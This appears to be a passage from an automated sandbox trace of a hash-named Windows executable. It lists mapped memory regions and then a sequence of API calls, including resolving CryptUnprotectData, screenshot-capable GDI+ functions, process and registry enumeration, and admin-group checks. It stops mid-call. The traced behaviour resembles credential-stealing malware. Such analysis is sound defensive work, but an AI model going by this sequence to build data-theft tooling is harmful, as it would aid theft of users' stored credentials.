2153 start_va = 0x970000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 2154 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2155 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2156 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2157 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2158 start_va = 0x800000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2159 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2160 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2161 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2162 start_va = 0xffeb0000 end_va = 0xfffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000ffeb0000" filename = "" Region: id = 2163 start_va = 0xf0000 end_va = 0x1adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2164 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2165 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2166 start_va = 0x1b0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2167 start_va = 0x980000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 2168 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2169 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2170 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2171 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2172 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2173 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2174 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2175 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2176 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2177 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2178 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2179 start_va = 0x800000 end_va = 0x829fff monitored = 0 entry_point = 0x805680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2180 start_va = 0x850000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 2181 start_va = 0xa80000 end_va = 0xc07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 2182 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2183 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2184 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2185 start_va = 0xc10000 end_va = 0xd90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 2186 start_va = 0x1130000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 2187 start_va = 0xda0000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 2188 start_va = 0x749d0000 end_va = 0x74b47fff monitored = 0 entry_point = 0x74a28a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2189 start_va = 0x74640000 end_va = 0x7464dfff monitored = 0 entry_point = 0x74645410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2190 start_va = 0x10010000 end_va = 0x10036fff monitored = 0 entry_point = 0x10011c61 region_type = mapped_file name = "crtdll.dll" filename = "\\Windows\\SysWOW64\\crtdll.dll" (normalized: "c:\\windows\\syswow64\\crtdll.dll") Region: id = 2191 start_va = 0x680f0000 end_va = 0x6825afff monitored = 0 entry_point = 0x6815e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 2192 start_va = 0x76370000 end_va = 0x7776efff monitored = 0 entry_point = 0x7652b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2193 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2194 start_va = 0x74c60000 end_va = 0x75158fff monitored = 0 entry_point = 0x74e67610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 2195 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2196 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2197 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2199 start_va = 0x77770000 end_va = 0x777b3fff monitored = 0 entry_point = 0x77777410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 2200 start_va = 0x757f0000 end_va = 0x757fefff monitored = 0 entry_point = 0x757f2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2201 start_va = 0x2530000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 2202 start_va = 0x70830000 end_va = 0x70a3cfff monitored = 0 entry_point = 0x7091acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2203 start_va = 0x72180000 end_va = 0x7244afff monitored = 0 entry_point = 0x723bc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2204 start_va = 0x2630000 end_va = 0x2966fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2205 start_va = 0x800000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2206 start_va = 0x810000 end_va = 0x810fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 2208 start_va = 0x761f0000 end_va = 0x7624efff monitored = 0 entry_point = 0x761f4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2209 start_va = 0x70800000 end_va = 0x70811fff monitored = 0 entry_point = 0x70804510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 2210 start_va = 0x72040000 end_va = 0x7206efff monitored = 0 entry_point = 0x7204bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2211 start_va = 0x70760000 end_va = 0x707fafff monitored = 0 entry_point = 0x7079f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 2212 start_va = 0xda0000 end_va = 0xddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 2213 start_va = 0xe20000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 2214 start_va = 0x2970000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 2215 start_va = 0x72100000 end_va = 0x7214efff monitored = 0 entry_point = 0x7210d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2216 start_va = 0x70750000 end_va = 0x70757fff monitored = 0 entry_point = 0x70751fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2217 start_va = 0x75250000 end_va = 0x75256fff monitored = 0 entry_point = 0x75251e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2219 start_va = 0xde0000 end_va = 0xe1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 2220 start_va = 0x2a70000 end_va = 0x2b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 2515 start_va = 0xe30000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2516 start_va = 0x2b70000 end_va = 0x2f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 2517 start_va = 0x820000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 2518 start_va = 0x75860000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75886220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2683 start_va = 0xe70000 end_va = 0xeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 2684 start_va = 0x2f70000 end_va = 0x336ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 2686 start_va = 0x830000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 2687 start_va = 0x72070000 end_va = 0x720f3fff monitored = 0 entry_point = 0x72096530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2688 start_va = 0x70a40000 end_va = 0x70bbdfff monitored = 0 entry_point = 0x70abc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2689 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2690 start_va = 0x72030000 end_va = 0x72037fff monitored = 0 entry_point = 0x72031920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2691 start_va = 0x71fe0000 end_va = 0x72026fff monitored = 0 entry_point = 0x71ff58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2692 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2693 start_va = 0x950000 end_va = 0x951fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 2694 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 2695 start_va = 0xeb0000 end_va = 0xeb7fff monitored = 0 entry_point = 0xeb19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 2696 start_va = 0x3370000 end_va = 0x376afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003370000" filename = "" Region: id = 2697 start_va = 0xeb0000 end_va = 0xeb7fff monitored = 0 entry_point = 0xeb19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Thread: id = 17 os_tid = 0x910 [0203.335] GetModuleHandleA (lpModuleName=0x0) returned 0xd0000 [0203.346] GetKeyboardType (nTypeFlag=0) returned 4 [0203.354] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe\"" [0203.354] GetStartupInfoA (in: lpStartupInfo=0x7ffef4 | out: lpStartupInfo=0x7ffef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0203.355] GetVersion () returned 0x295a000a [0203.355] GetVersion () returned 0x295a000a [0203.355] GetCurrentThreadId () returned 0x910 [0203.412] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x749d0000 [0203.423] GetProcAddress (hModule=0x749d0000, lpProcName="CryptUnprotectData") returned 0x749f3140 [0203.595] LoadLibraryA (lpLibFileName="crtdll.dll") returned 0x10010000 [0203.849] GetProcAddress (hModule=0x10010000, lpProcName="wcscmp") returned 0x1002032a [0203.849] LoadLibraryA (lpLibFileName="Gdiplus.dll") returned 0x680f0000 [0204.533] GetProcAddress (hModule=0x680f0000, lpProcName="GdiplusStartup") returned 0x6815ab50 [0204.534] LoadLibraryA (lpLibFileName="Gdiplus.dll") returned 0x680f0000 [0204.534] GetProcAddress (hModule=0x680f0000, lpProcName="GdiplusShutdown") returned 0x6815a7c0 [0204.534] LoadLibraryA (lpLibFileName="Gdiplus.dll") returned 0x680f0000 [0204.534] GetProcAddress (hModule=0x680f0000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x68135b70 [0204.534] LoadLibraryA (lpLibFileName="Gdiplus.dll") returned 0x680f0000 [0204.535] GetProcAddress (hModule=0x680f0000, lpProcName="GdipGetImageEncodersSize") returned 0x6814f520 [0204.535] LoadLibraryA (lpLibFileName="Gdiplus.dll") returned 0x680f0000 [0204.535] GetProcAddress (hModule=0x680f0000, lpProcName="GdipGetImageEncoders") returned 0x6814f380 [0204.535] LoadLibraryA (lpLibFileName="Gdiplus.dll") returned 0x680f0000 [0204.535] GetProcAddress (hModule=0x680f0000, lpProcName="GdipDisposeImage") returned 0x681591c0 [0204.535] LoadLibraryA (lpLibFileName="Gdiplus.dll") returned 0x680f0000 [0204.536] GetProcAddress (hModule=0x680f0000, lpProcName="GdipSaveImageToStream") returned 0x68154bd0 [0204.536] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75160000 [0204.536] GetProcAddress (hModule=0x75160000, lpProcName="CreateStreamOnHGlobal") returned 0x75561370 [0204.536] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75160000 [0204.536] GetProcAddress (hModule=0x75160000, lpProcName="GetHGlobalFromStream") returned 0x75561a60 [0204.545] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0204.545] GetProcAddress (hModule=0x74650000, lpProcName="ExpandEnvironmentStringsW") returned 0x7466cd50 [0204.545] GetProcAddress (hModule=0x74650000, lpProcName="GetComputerNameW") returned 0x746746a0 [0204.545] GetProcAddress (hModule=0x74650000, lpProcName="GlobalMemoryStatus") returned 0x74668e00 [0204.545] GetProcAddress (hModule=0x74650000, lpProcName="CreateFileW") returned 0x74676890 [0204.546] GetProcAddress (hModule=0x74650000, lpProcName="GetFileSize") returned 0x74676a70 [0204.546] GetProcAddress (hModule=0x74650000, lpProcName="CloseHandle") returned 0x74676630 [0204.546] GetProcAddress (hModule=0x74650000, lpProcName="ReadFile") returned 0x74676bb0 [0204.546] GetProcAddress (hModule=0x74650000, lpProcName="GetFileAttributesW") returned 0x74676a50 [0204.546] GetProcAddress (hModule=0x74650000, lpProcName="CreateMutexA") returned 0x746766c0 [0204.547] GetProcAddress (hModule=0x74650000, lpProcName="ReleaseMutex") returned 0x746767a0 [0204.547] GetProcAddress (hModule=0x74650000, lpProcName="GetLastError") returned 0x74663870 [0204.547] GetProcAddress (hModule=0x74650000, lpProcName="GetCurrentDirectoryW") returned 0x7466a9a0 [0204.547] GetProcAddress (hModule=0x74650000, lpProcName="SetEnvironmentVariableW") returned 0x7466e9e0 [0204.547] GetProcAddress (hModule=0x74650000, lpProcName="SetCurrentDirectoryW") returned 0x7466fb20 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="FindFirstFileW") returned 0x74676960 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="FindNextFileW") returned 0x746769a0 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="LocalFree") returned 0x746679a0 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="GetTickCount") returned 0x74675eb0 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="CopyFileW") returned 0x74676ec0 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="FindClose") returned 0x746768e0 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="GlobalMemoryStatusEx") returned 0x7466afe0 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="CreateToolhelp32Snapshot") returned 0x74677b50 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="Process32FirstW") returned 0x7466f5a0 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="Process32NextW") returned 0x7466d290 [0204.548] GetProcAddress (hModule=0x74650000, lpProcName="GetModuleFileNameW") returned 0x74669b00 [0204.549] GetProcAddress (hModule=0x74650000, lpProcName="SetDllDirectoryW") returned 0x74675070 [0204.549] GetProcAddress (hModule=0x74650000, lpProcName="GetLocaleInfoA") returned 0x7466e7b0 [0204.549] GetProcAddress (hModule=0x74650000, lpProcName="GetLocalTime") returned 0x74669be0 [0204.549] GetProcAddress (hModule=0x74650000, lpProcName="GetTimeZoneInformation") returned 0x7466acc0 [0204.549] GetProcAddress (hModule=0x74650000, lpProcName="RemoveDirectoryW") returned 0x74676bf0 [0204.549] GetProcAddress (hModule=0x74650000, lpProcName="DeleteFileW") returned 0x746768c0 [0204.549] GetProcAddress (hModule=0x74650000, lpProcName="GetLogicalDriveStringsA") returned 0x7468e790 [0204.549] GetProcAddress (hModule=0x74650000, lpProcName="GetDriveTypeA") returned 0x74676a00 [0204.549] GetProcAddress (hModule=0x74650000, lpProcName="CreateProcessW") returned 0x7466b000 [0204.549] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77820000 [0204.550] GetProcAddress (hModule=0x77820000, lpProcName="GetUserNameW") returned 0x77841030 [0204.550] GetProcAddress (hModule=0x77820000, lpProcName="RegCreateKeyExW") returned 0x7783fa20 [0204.550] GetProcAddress (hModule=0x77820000, lpProcName="RegQueryValueExW") returned 0x7783f330 [0204.550] GetProcAddress (hModule=0x77820000, lpProcName="RegCloseKey") returned 0x7783f620 [0204.550] GetProcAddress (hModule=0x77820000, lpProcName="RegOpenKeyExW") returned 0x7783f350 [0204.550] GetProcAddress (hModule=0x77820000, lpProcName="AllocateAndInitializeSid") returned 0x7783f660 [0204.550] GetProcAddress (hModule=0x77820000, lpProcName="LookupAccountSidA") returned 0x77854460 [0204.550] GetProcAddress (hModule=0x77820000, lpProcName="CreateProcessAsUserW") returned 0x77842c10 [0204.550] GetProcAddress (hModule=0x77820000, lpProcName="CheckTokenMembership") returned 0x7783fb50 [0204.550] GetProcAddress (hModule=0x77820000, lpProcName="RegOpenKeyW") returned 0x7783faa0 [0204.551] GetProcAddress (hModule=0x77820000, lpProcName="RegEnumKeyW") returned 0x7783f750 [0204.551] GetProcAddress (hModule=0x77820000, lpProcName="RegEnumValueW") returned 0x7783f680 [0204.551] GetProcAddress (hModule=0x77820000, lpProcName="CryptAcquireContextA") returned 0x77840630 [0204.551] GetProcAddress (hModule=0x77820000, lpProcName="CryptCreateHash") returned 0x7783fa00 [0204.551] GetProcAddress (hModule=0x77820000, lpProcName="CryptHashData") returned 0x7783fb10 [0204.551] GetProcAddress (hModule=0x77820000, lpProcName="CryptGetHashParam") returned 0x7783f7d0 [0204.551] GetProcAddress (hModule=0x77820000, lpProcName="CryptDestroyHash") returned 0x778402a0 [0204.551] GetProcAddress (hModule=0x77820000, lpProcName="CryptReleaseContext") returned 0x77840650 [0204.551] LoadLibraryA (lpLibFileName="user32.dll") returned 0x74790000 [0204.551] GetProcAddress (hModule=0x74790000, lpProcName="EnumDisplayDevicesW") returned 0x747afa50 [0204.551] GetProcAddress (hModule=0x74790000, lpProcName="wvsprintfA") returned 0x747c04c0 [0204.552] GetProcAddress (hModule=0x74790000, lpProcName="GetKeyboardLayoutList") returned 0x747c8e70 [0204.552] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x76370000 [0204.627] GetProcAddress (hModule=0x76370000, lpProcName="ShellExecuteExW") returned 0x7650e690 [0204.627] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x778f0000 [0204.627] GetProcAddress (hModule=0x778f0000, lpProcName="RtlComputeCrc32") returned 0x779bd9b0 [0204.632] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x862150 [0204.632] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2530000 [0204.632] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x863150 [0204.632] VirtualAlloc (lpAddress=0x2530000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2530000 [0204.633] AllocateAndInitializeSid (in: pIdentifierAuthority=0x7ffcb9, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x222, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x7ffcb4 | out: pSid=0x7ffcb4*=0x85bee0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0204.633] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x85bee0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x7ffcb0 | out: IsMember=0x7ffcb0) returned 1 [0204.633] AllocateAndInitializeSid (in: pIdentifierAuthority=0x7ffcb9, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x221, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x7ffcb4 | out: pSid=0x7ffcb4*=0x85bd90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0204.633] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x85bd90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), 